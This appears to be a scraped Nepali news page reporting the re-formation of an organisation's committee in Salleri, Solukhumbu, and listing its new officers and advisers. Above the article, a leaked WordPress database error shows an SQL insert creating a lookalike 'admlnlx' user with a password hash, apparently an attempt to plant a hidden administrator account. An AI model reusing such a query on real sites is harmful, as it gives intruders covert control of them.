WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmCito27CNb1U2g9JTEOTXs0XOmLRN0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 23:08:56', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु जिल्लाको सदरमुकाम सल्लेरीमा आयोजित एक कार्यक्रम बीच स्मारीका बस्नेतको अध्यक्षतामा २०७७ मा गठित समितिलाई नयाँ कार्यसमिति सहित पून गठन गरेको हो ।
पून गठित नयाँ कार्यसमितिको अध्यक्षमा दुर्गा प्रसाद खिालिङ, उपाध्यक्षमा दिपेन्द्र कुलुङ, सचिवमा सुमन उदाश, सह–सचिवमा शक्ति कुलुङ, कोषाध्यक्षमा विविका कटुवाल र सदस्यमा डम्बर कुमारी घिमिरे, आशिष राई, जाङ्मु शेर्पा, विमला विश्वकर्मा, छोटी शेर्पा, होम प्रकाश राई रहेकाछन् ।
उक्त भेलाले सस्थाको एक सल्लाहार समिति पनि चयन गरेको छ । सल्लाहकार समितिमा फुदोर्जी तामाङ, पूर्णबहादुर राई, जसबहादुर राई, सुवास तामाङ र ध्रुवधन राई चयन गरिएको अध्यक्ष राईले बताए ।